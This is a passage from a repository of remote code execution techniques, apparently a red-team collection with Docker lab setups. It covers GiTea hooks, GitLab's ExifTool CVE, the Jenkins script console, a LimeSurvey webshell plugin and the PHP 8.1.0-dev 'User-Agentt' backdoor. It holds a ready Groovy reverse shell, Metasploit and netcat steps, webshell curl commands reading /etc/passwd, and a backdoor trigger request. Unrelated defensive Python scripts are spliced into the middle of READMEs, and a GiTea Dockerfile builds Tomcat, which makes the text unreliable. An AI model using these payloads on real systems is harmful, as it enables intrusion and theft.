  -p PASSWORD, --password PASSWORD
                        GiTea password
  -I REV_IP, --rev-ip REV_IP
                        Reverse shell listener IP
  -P REV_PORT, --rev-port REV_PORT
                        Reverse shell listener port
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        Path to shell script payload to use.
```

## References
- https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce
- https://github.com/go-gitea/gitea/pull/13058
--------------------------------------------------------------------------------
/Other/GiTea/techniques/User-with-git-hooks-activated/technique.json:
--------------------------------------------------------------------------------
{
    "name": "GiTea - User with git hooks activated",
    "work_in_progress": false,
    "references": [
        "https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce",
        "https://github.com/go-gitea/gitea/pull/13058"
    ]
}
--------------------------------------------------------------------------------
/Other/GiTea/techniques/User-with-git-hooks-activated/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM tomcat:9.0.62-jdk11-openjdk-slim-buster

# https://octopus.com/blog/deployable-tomcat-docker-containers

RUN mv /usr/local/tomcat/webapps /usr/local/tomcat/webapps2 ;\
    mv /usr/local/tomcat/webapps.dist /usr/local/tomcat/webapps

COPY ./files/context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml
COPY ./files/tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml

CMD ["catalina.sh", "run"]
--------------------------------------------------------------------------------
/Other/GiTea/techniques/User-with-git-hooks-activated/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: all build start background shell stop

IMGNAME := awesome_rce_gitea_git_hooks
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p $(PORT):8080 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):8080 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Other/Gitlab/README.md:
--------------------------------------------------------------------------------
# Gitlab

## Introduction

Gitlab is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more.

## Techniques to achieve RCE with Gitlab

### Unauthenticated

- [CVE-2021-22205 - Unauthenticated RCE with exiftool](techniques/CVE-2021-22205%20-%20Unauthenticated%20RCE%20using%20ExifTool/README.md)
--------------------------------------------------------------------------------
/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/README.md:
--------------------------------------------------------------------------------
# Gitlab - CVE-2021-22205 Unauthenticated RCE with exiftool

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser, which resulted in remote command execution.

## Requirements

This vulnerability affects the following **Gitlab CE/EE** versions:

- `>=11.9`, `<13.8.8`
- `>=13.9`, `<13.9.6`
- `>=13.10`, `<13.10.3`

## Exploitation

### Step 1: Detection

**Try to find the version of Gitlab**
First of all, before trying to exploit the RCE, we need to find the version of Gitlab.
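The Description above points at the `ENABLE_GIT_HOOKS` line in the Gitea config file as the setting a hardening review should look at. The following audit script is an added example for defenders, not code from this repository or from Gitea: it parses an `app.ini` (including top-level keys that precede any section) and reports whether custom git hooks are turned on. Beyond what the page states, it assumes that Gitea's example config also spells the key `DISABLE_GIT_HOOKS` under `[security]` with inverted meaning; the sample config is constructed.

```python
"""Audit a Gitea app.ini for the custom git hooks setting (added example)."""
from __future__ import annotations

import configparser
from dataclasses import dataclass

# Keys whose effective value means "privileged users may run custom hooks".
# ENABLE_GIT_HOOKS is the key quoted on the page; DISABLE_GIT_HOOKS is the
# spelling used by Gitea's example config (assumption), with inverted meaning.
HOOK_KEYS = {"enable_git_hooks": True, "disable_git_hooks": False}

ROOT_SECTION = "__root__"  # placeholder for keys that precede any [section]

TRUTHY = {"1", "true", "yes", "on"}
FALSY = {"0", "false", "no", "off"}


@dataclass(frozen=True)
class Finding:
    section: str
    key: str
    value: str
    hooks_enabled: bool  # True is the risky state


def load_app_ini(text: str) -> configparser.ConfigParser:
    """Parse Gitea's ini dialect: keys may appear before the first section,
    keys are case-insensitive, and ';' or '#' start comments."""
    parser = configparser.ConfigParser(
        delimiters=("=",),         # values such as URLs contain ':'
        interpolation=None,        # Gitea uses %(VAR)s literally; do not expand
        strict=False,              # tolerate duplicate keys in hand-edited files
        inline_comment_prefixes=(";", "#"),
    )
    # configparser rejects keys outside a section, so give them a synthetic one.
    parser.read_string(f"[{ROOT_SECTION}]\n" + text)
    return parser


def _as_bool(raw: str) -> bool | None:
    v = raw.strip().strip('"').strip("'").lower()
    if v in TRUTHY:
        return True
    if v in FALSY:
        return False
    return None


def audit_git_hooks(text: str) -> list[Finding]:
    """Return one Finding per git-hook setting found, with its meaning resolved."""
    parser = load_app_ini(text)
    findings: list[Finding] = []
    for section in parser.sections():
        for key, raw in parser.items(section):
            if key not in HOOK_KEYS:
                continue
            val = _as_bool(raw)
            if val is None:
                continue  # unparseable value: leave for manual review
            enabled = val if HOOK_KEYS[key] else not val
            findings.append(Finding(section, key.upper(), raw.strip(), enabled))
    return findings


def hooks_enabled(text: str) -> bool:
    """True if any setting in the file turns custom git hooks on."""
    return any(f.hooks_enabled for f in audit_git_hooks(text))


# Constructed sample app.ini (placeholder hostname, not a real instance).
SAMPLE_APP_INI = """\
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod

[server]
ROOT_URL = http://gitea.example.invalid/

[security]
INSTALL_LOCK = true
; constructed risky setting: custom hooks allowed for privileged users
DISABLE_GIT_HOOKS = false
"""

if __name__ == "__main__":
    for f in audit_git_hooks(SAMPLE_APP_INI):
        state = "ENABLED (review who holds 'May create git hooks')" if f.hooks_enabled else "disabled"
        print(f"[{f.section}] {f.key} = {f.value} -> custom git hooks {state}")
```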

- **Authenticated**: The version can often be found on the `/help` endpoint when authenticated with a user account.

![](imgs/gitlab_version.png)

- **Unauthenticated**: On recent versions, the `What's new` feature on the `/help` endpoint shows an approximate version without authentication. Find this menu by clicking on the `?` button at the top right.

![](imgs/gitlab_approximative_version.png)

**Nuclei detection**
Some nuclei templates are available for detection with id `CVE-2021-22205`, `gitlab-rce` or tag `gitlab`:
- [gitlab-rce template](https://github.com/projectdiscovery/nuclei-templates/blob/d6636f9169920d3ccefc692bc1a6136e2deb9205/vulnerabilities/gitlab/gitlab-rce.yaml)
- [CVE-2021-22205 template](https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml)

`nuclei -u http://192.168.1.10 -id CVE-2021-22205,gitlab-rce`

![](imgs/nuclei_id.png)

`nuclei -u http://192.168.1.10 -tags gitlab -silent`

![](imgs/nuclei_tags.png)

### Step 2.1: Exploit using metasploit

This RCE technique is available in the `multi/http/gitlab_exif_rce` module in metasploit.

```bash
use multi/http/gitlab_exif_rce
set RHOSTS 192.168.1.10
set LHOST wlan0
run
```
**Enjoy your shell**

After running the metasploit module, if the remote Gitlab is vulnerable you will get a Meterpreter session.

![](imgs/metasploit_gitlab_rce.png)

### Step 2.2: Exploit without Metasploit

Inspiringz made a [Python exploit](https://github.com/inspiringz/CVE-2021-22205).

**Start your listener**

`nc -lvnp 1337`

**Enjoy your shell**

![](imgs/rev_shell_python.png)

## References

- [Action needed by self-managed customers in response to CVE-2021-22205](https://about.gitlab.com/blog/2021/11/04/action-needed-in-response-to-cve2021-22205/)
- [Hackerone report #1154542](https://hackerone.com/reports/1154542)
- [Gitlab issue #327121](https://gitlab.com/gitlab-org/gitlab/-/issues/327121)
--------------------------------------------------------------------------------
/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Gitlab - CVE-2021-22205 Unauthenticated RCE with exiftool",
    "work_in_progress": false,
    "references": [
        "https://about.gitlab.com/blog/2021/11/04/action-needed-in-response-to-cve2021-22205/",
        "https://hackerone.com/reports/1154542",
        "https://gitlab.com/gitlab-org/gitlab/-/issues/327121"
    ]
}
--------------------------------------------------------------------------------
/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/test_env/Dockerfile:
--------------------------------------------------------------------------------
# Last vulnerable 13.10.x release per the Requirements section (13.10 <= version < 13.10.3).
FROM gitlab/gitlab-ee:13.10.0-ee.0
--------------------------------------------------------------------------------
/Other/Gitlab/techniques/CVE-2021-22205 - Unauthenticated RCE using ExifTool/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: all build start background shell stop

IMGNAME := awesome_rce_gitlab_exiftool

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p 80:80 -p 443:443 $(IMGNAME)

background:
	docker run --rm -d -p 80:80 -p 443:443 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Other/Jenkins/README.md:
--------------------------------------------------------------------------------
# Jenkins

## Introduction

Jenkins is an open source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat.
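The Requirements section above lists the affected GitLab version ranges, and the GiTea technique earlier on this page gives 1.1.0 through 1.12.5 (fixed in 1.13.0). As an added example for defenders, not code from this repository, the following checker compares version strings such as the `13.10.0-ee.0` image tag from the test_env against those ranges, ignoring suffixes like `-ee.0`; the inventory at the bottom is constructed.

```python
"""Check reported GitLab / Gitea versions against the ranges this page lists
as affected (added example, not part of the original repository)."""
from __future__ import annotations

import re
from typing import Iterable

# (inclusive lower bound, exclusive upper bound), copied from the page.
AFFECTED_RANGES: dict[str, list[tuple[str, str]]] = {
    # GitLab CE/EE, CVE-2021-22205
    "gitlab": [("11.9", "13.8.8"), ("13.9", "13.9.6"), ("13.10", "13.10.3")],
    # Gitea 1.1.0 through 1.12.5 inclusive, i.e. [1.1.0, 1.13.0)
    "gitea": [("1.1.0", "1.13.0")],
}


def parse_version(text: str) -> tuple[int, ...]:
    """Turn '13.10.0-ee.0' or 'v1.12.5' into a comparable tuple such as (13, 10, 0).

    Only the leading dotted numeric components count; suffixes like '-ee.0'
    or '+dev' are ignored, which is what the page's ranges require.
    """
    m = re.match(r"v?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def _padded(v: tuple[int, ...], width: int) -> tuple[int, ...]:
    # Zero-pad so that (13, 9) compares equal to (13, 9, 0), not below it.
    return v + (0,) * (width - len(v))


def in_range(version: str, lower: str, upper: str) -> bool:
    """True if lower <= version < upper, comparing numeric components."""
    v, lo, hi = parse_version(version), parse_version(lower), parse_version(upper)
    width = max(len(v), len(lo), len(hi))
    return _padded(lo, width) <= _padded(v, width) < _padded(hi, width)


def is_affected(product: str, version: str) -> bool:
    """Return True if the version lies in any affected range for the product."""
    return any(in_range(version, lo, hi) for lo, hi in AFFECTED_RANGES[product])


def triage(reports: Iterable[tuple[str, str]]) -> list[tuple[str, str, bool]]:
    """Evaluate (product, version) pairs, e.g. as scraped from an asset inventory."""
    return [(p, v, is_affected(p, v)) for p, v in reports]


if __name__ == "__main__":
    # Constructed sample inventory; 13.10.0-ee.0 is the test_env image tag on the page.
    sample = [
        ("gitlab", "13.10.0-ee.0"),
        ("gitlab", "13.8.8"),
        ("gitlab", "13.9.6"),
        ("gitea", "1.12.5"),
        ("gitea", "1.13.0"),
    ]
    for product, version, hit in triage(sample):
        print(f"{product:7s} {version:14s} {'AFFECTED' if hit else 'not affected'}")
```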

## Techniques to achieve RCE with Jenkins

### With admin credentials

- [Execute a script in the console](techniques/Execute-a-script-in-the-console/README.md)
--------------------------------------------------------------------------------
/Other/Jenkins/techniques/Execute-a-script-in-the-console/README.md:
--------------------------------------------------------------------------------
# Jenkins - Execute a script in the console

## Requirements

- A valid **username and password** of a user with **admin rights** on the Jenkins instance.

## Exploitation

### Step 1: Access the Jenkins instance

First of all, you need to log into Jenkins with a user having **admin rights**:

![](./imgs/welcome.png)

### Step 2: Access the script console

Then go to the Jenkins script console page:

![](./imgs/script_console.png)

### Step 3: Start a reverse shell

You can execute Groovy scripts in the Jenkins script console, so you can start a reverse shell!
You can use the following payload (from here: [https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#groovy](https://podalirius.net/en/articles/unix-reverse-shells-cheatsheet/#groovy)):

```java
String host="192.168.1.27";
int port=4444;
String cmd="/bin/sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
```

![](./imgs/reverse_shell.png)

### Step 4: Enjoy your shell

Now, prepare your listener with netcat (`nc -lvp <port>`, using the port set in the payload) and enjoy your shell:

![](./imgs/shell.png)

### Demonstration

Here is a video walkthrough of this technique:

https://user-images.githubusercontent.com/79218792/168493712-3eb87dbc-68ae-4e9b-ba57-160f9fba37f1.mp4

## References
- https://github.com/p0dalirius/LimeSurvey-plugin-webshell
--------------------------------------------------------------------------------
/Other/Jenkins/techniques/Execute-a-script-in-the-console/technique.json:
--------------------------------------------------------------------------------
{
    "name": "Jenkins - Execute a script in the console",
    "work_in_progress": false,
    "references": [
        "https://github.com/p0dalirius/LimeSurvey-plugin-webshell"
    ]
}
--------------------------------------------------------------------------------
/Other/Jenkins/techniques/Execute-a-script-in-the-console/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM jenkins:2.60.3

--------------------------------------------------------------------------------
/Other/Jenkins/techniques/Execute-a-script-in-the-console/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_jenkins_script_console

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p 8080:8080 -p 50000:50000 $(IMGNAME)

background:
	docker run --rm -d -p 8080:8080 -p 50000:50000 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Other/LimeSurvey/README.md:
--------------------------------------------------------------------------------
# LimeSurvey

LimeSurvey is a free and open source on-line statistical survey web app written in PHP based on a MySQL, SQLite, PostgreSQL or MSSQL database, distributed under the GNU General Public License.

- https://www.limesurvey.org/
- https://community.limesurvey.org/downloads/

## Techniques to achieve RCE with LimeSurvey

### With admin credentials

- [Upload a plugin](./techniques/Upload-a-plugin/README.md)

--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/README.md:
--------------------------------------------------------------------------------
# LimeSurvey - Upload a plugin

## Requirements

- A valid **username and password** of a user with **admin rights** on the LimeSurvey.

## Exploitation

### Step 1: Upload the webshell plugin

Go to the "Configuration --> plugins" page, at http://TARGET:10080/index.php/admin/pluginmanager/sa/index, and click on "Upload & install":

![](./imgs/upload_and_install.png)

### Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://TARGET/upload/plugins/WebShell/webshell.php with `action=exec&cmd=id`:

```sh
$ curl -X POST 'http://TARGET:10080/upload/plugins/WebShell/webshell.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"}
```

You can also access it with a GET request from a browser:

![](./imgs/exec_code_web.png)

### Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request to http://TARGET:10080/upload/plugins/WebShell/webshell.php with `action=download&path=/etc/passwd`:

```sh
$ curl -X POST 'http://TARGET:10080/upload/plugins/WebShell/webshell.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
```


### Step 3: The interactive console

When your webshell is active, you can use the interactive [console.py](https://github.com/p0dalirius/LimeSurvey-plugin-webshell/blob/main/console.py) to execute commands and download remote files.
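The webshell above is reached over plain HTTP at a fixed path with `action=exec` / `action=download` parameters, which leaves a footprint in the web server's access log. The following Python is an added example for the defender's side, not code from the Awesome-RCE-techniques repository or from the LimeSurvey-plugin-webshell project: it parses Apache/nginx combined-format log lines and flags direct requests for PHP files under LimeSurvey's `/upload/` directory (an assumption made here: plugin code is loaded by the plugin manager and is not normally requested by URL) and any request carrying one of the webshell's action parameters. The log lines are constructed.

```python
"""Spot direct hits on an uploaded LimeSurvey plugin webshell in access logs.

Added example, not code from the repository above. Assumptions: (1) the log is
in the Apache/nginx "combined" format; (2) PHP files below LimeSurvey's
/upload/ directory are never legitimately requested straight from a browser.
The sample lines are constructed; the path and parameters are the ones the
README shows (webshell.php with action=exec / action=download).
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Combined log format; everything after the response size (referer, UA) is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Webshell actions from the README. POST bodies are not logged, so only GET
# requests expose them; the path rule in classify() is what catches the POSTs.
WEBSHELL_ACTIONS = {"exec", "download"}


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Reasons this request looks like webshell traffic; [] means nothing seen."""
    url = urlsplit(entry["target"])
    path = url.path.lower()
    reasons = []
    if path.startswith("/upload/") and path.endswith(".php"):
        reasons.append("direct request for a PHP file under /upload/")
    actions = set(parse_qs(url.query).get("action", [])) & WEBSHELL_ACTIONS
    if actions:
        reasons.append("webshell action parameter: " + ",".join(sorted(actions)))
    return reasons


def find_webshell_hits(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over raw log lines; lines that do not parse are skipped."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append({"ip": entry["ip"], "method": entry["method"],
                         "target": entry["target"], "reasons": reasons})
    return hits


# Constructed sample: two legitimate requests, then the two webshell calls
# from the README (a POST, whose body is invisible here, and a GET).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jun/2022:10:00:01 +0000] "GET /index.php/admin/pluginmanager/sa/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Jun/2022:10:00:09 +0000] "GET /upload/themes/survey/default/css/theme.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jun/2022:10:02:33 +0000] "POST /upload/plugins/WebShell/webshell.php HTTP/1.1" 200 93 "-" "curl/7.74.0"',
    '10.0.0.9 - - [12/Jun/2022:10:02:40 +0000] "GET /upload/plugins/WebShell/webshell.php?action=download&path=/etc/passwd HTTP/1.1" 200 1402 "-" "curl/7.74.0"',
]

if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit)
```

Because the `curl -X POST` calls shown above carry their parameters in the body, the path rule is what catches them; pair the log check with file-integrity monitoring of `upload/plugins/` so a newly written `.php` file is noticed even before it is called.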

https://user-images.githubusercontent.com/79218792/163652719-eb16acba-6e2c-47a2-bc52-21ceff24dc09.mp4

## References
- https://github.com/p0dalirius/LimeSurvey-plugin-webshell

--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/configuration_plugins.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/configuration_plugins.png
--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/exec_code_web.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/exec_code_web.png
--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/upload_and_install.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/LimeSurvey/techniques/Upload-a-plugin/imgs/upload_and_install.png
--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/technique.json:
--------------------------------------------------------------------------------
{
    "name": "LimeSurvey - Upload a plugin",
    "work_in_progress": false,
    "references": [
        "https://github.com/p0dalirius/LimeSurvey-plugin-webshell"
    ]
}
--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/test_env/Dockerfile:
--------------------------------------------------------------------------------
FROM debian:buster

RUN apt-get -y -q update; \
    apt-get -y -q install apache2 xxd git unzip wget php php-simplexml php-gd php-ldap php-zip php-imap php-mysql php-mbstring mariadb-client mariadb-server

RUN service mysql start;\
    mysql -u root -e "CREATE USER 'db'@'%' IDENTIFIED BY 'db'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = 'db'; GRANT ALL PRIVILEGES ON *.* TO 'db'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;"

RUN wget https://github.com/LimeSurvey/LimeSurvey/archive/refs/tags/5.2.4+211129.zip -O /tmp/LimeSurvey.zip ;\
    cd /var/www/html/; rm index.html; unzip /tmp/LimeSurvey.zip; mv LimeSurvey-5.2.4-211129/* .

RUN chown www-data: -R /var/www/

RUN echo "#!/bin/bash" > /entrypoint.sh ;\
    echo "service mysql start" >> /entrypoint.sh ;\
    echo "apachectl -D FOREGROUND" >> /entrypoint.sh ;\
    chmod +x /entrypoint.sh

EXPOSE 80

CMD /entrypoint.sh

--------------------------------------------------------------------------------
/Other/LimeSurvey/techniques/Upload-a-plugin/test_env/Makefile:
--------------------------------------------------------------------------------
.PHONY: build img

IMGNAME := awesome_rce_limesurvey_upload_plugin
PORT := 10080

all : build

build:
	docker build -t $(IMGNAME):latest -f Dockerfile .

start:
	docker run --rm -it -p $(PORT):80 $(IMGNAME)

background:
	docker run --rm -d -p $(PORT):80 $(IMGNAME)

shell:
	docker exec -it $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}') bash

stop:
	docker stop $(shell docker ps | grep $(IMGNAME) | awk '{split($$0,a," "); print a[1]}')
--------------------------------------------------------------------------------
/Other/PHP/README.md:
--------------------------------------------------------------------------------
# PHP

PHP is a general-purpose scripting language geared toward web development. It was originally created by Danish-Canadian programmer Rasmus Lerdorf in 1994. The PHP reference implementation is now produced by The PHP Group. PHP originally stood for Personal Home Page, but it now stands for the recursive initialism PHP: Hypertext Preprocessor.

- Official site: https://www.php.net/
- PHP engine source code: https://github.com/php/php-src/

## Techniques to achieve RCE with PHP

### Version specific

- [PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution](./techniques/PHP-8.1.0-dev-User-Agentt-RCE/README.md)

--------------------------------------------------------------------------------
/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/README.md:
--------------------------------------------------------------------------------
# PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

## Requirements

- The server needs to run a specific backdoored version of PHP (PHP-8.1.0-dev)

## Introduction

A compromised git account pushed code to the PHP source repository introducing a backdoor in commit [c730aa26bd52829a49f2ad284b181b7e82a68d7d](https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d):

```c
{
    zval zoh;
    php_output_handler *h;
    zval *enc;

    if ((Z_TYPE(PG(http_globals)[TRACK_VARS_SERVER]) == IS_ARRAY || zend_is_auto_global_str(ZEND_STRL("_SERVER"))) &&
        (enc = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]), "HTTP_USER_AGENTT", sizeof("HTTP_USER_AGENTT") - 1))) {
        convert_to_string(enc);
        if (strstr(Z_STRVAL_P(enc), "zerodium")) {
            zend_try {
                zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
            } zend_end_try();
        }
    }
}
```

This code evaluates the string contained in the `User-Agentt` header if that string starts with `zerodium`.

## Exploitation

You can execute PHP code (prefixed by the string `zerodium`) on the remote machine through the `User-Agentt` header:

```sh
curl -H 'Accept-Encoding: deflate' -H "User-Agentt: zerodiumsystem('id');" 'http://127.0.0.1:10080/dummy.php'
```

## References
- https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
- https://news-web.php.net/php.internals/113838

--------------------------------------------------------------------------------
/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/imgs/phpinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/p0dalirius/Awesome-RCE-techniques/b55a4099b86a43b7d412d7628bb4e0ac453d7a6b/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/imgs/phpinfo.png
--------------------------------------------------------------------------------
/Other/PHP/techniques/PHP-8.1.0-dev-User-Agentt-RCE/technique.json:
--------------------------------------------------------------------------------
{
    "name": "PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",
    "work_in_progress": false,
    "references": [
        "https://flast101.github.io/php-8.1.0-dev-backdoor-rce/",
        "https://news-web.php.net/php.internals/113838"
    ]
}
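For the defender's side of the backdoor described in the README above, here is an added Python example (not code from the repository or from php-src). It generalises the `grep -rain zerodium` check that the test environment's entrypoint runs on `ext/zlib/zlib.c` to a whole source tree, reporting a file only when it carries the backdoor's own markers rather than `zend_eval_string` alone, and it flags HTTP requests whose `User-Agentt` header contains the `zerodium` trigger, for a WAF rule or request-log review. The C fragments and request headers are constructed samples.

```python
"""Defensive checks for the PHP 8.1.0-dev "User-Agentt" backdoor described above.

Added example, not code from the Awesome-RCE-techniques repository or php-src.
  * scan_sources(): a file is reported only when it contains the backdoor's
    markers (HTTP_USER_AGENTT / zerodium); zend_eval_string on its own is not
    enough, since clean engine code defines and uses that function.
  * is_backdoor_trigger(): true for a request whose User-Agentt header carries
    the "zerodium" trigger. The backdoor tests with strstr(), so the trigger is
    matched anywhere in the value, not only at the start.
"""
from pathlib import Path
from typing import Dict, Iterable, List, Mapping, Tuple

# Strings only the backdoored zlib.c contains (see the C snippet in the README).
BACKDOOR_MARKERS: Tuple[str, ...] = ("HTTP_USER_AGENTT", "zerodium")
# Also in the backdoor, but legitimate elsewhere: reported only next to a real marker.
EVAL_MARKER = "zend_eval_string"
TRIGGER = "zerodium"
HEADER = "user-agentt"


def scan_text(text: str) -> List[str]:
    """Markers found in one C source file; [] means the file is clean."""
    hits = [m for m in BACKDOOR_MARKERS if m in text]
    if hits and EVAL_MARKER in text:
        hits.append(EVAL_MARKER)
    return hits


def scan_sources(files: Mapping[str, str]) -> Dict[str, List[str]]:
    """Map path -> markers for every entry of {path: contents} that is not clean."""
    return {path: hits for path, text in files.items() if (hits := scan_text(text))}


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Filesystem front end: read every .c file below root and run scan_sources()."""
    files = {str(p.relative_to(root)): p.read_text(errors="replace")
             for p in root.rglob("*.c")}
    return scan_sources(files)


def is_backdoor_trigger(headers: Mapping[str, str]) -> bool:
    """True if a User-Agentt header (name matched case-insensitively) contains the trigger."""
    return any(name.lower() == HEADER and TRIGGER in value
               for name, value in headers.items())


def flag_requests(requests: Iterable[Mapping[str, str]]) -> List[int]:
    """Indices of the requests (each a header dict) that would reach the backdoor's eval."""
    return [i for i, h in enumerate(requests) if is_backdoor_trigger(h)]


# Constructed samples: the backdoored fragment, a clean engine file that
# legitimately defines zend_eval_string, an unrelated file, and three requests.
SAMPLE_FILES = {
    "ext/zlib/zlib.c": (
        'enc = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]), '
        '"HTTP_USER_AGENTT", sizeof("HTTP_USER_AGENTT") - 1);\n'
        'if (strstr(Z_STRVAL_P(enc), "zerodium")) { zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS"); }\n'
    ),
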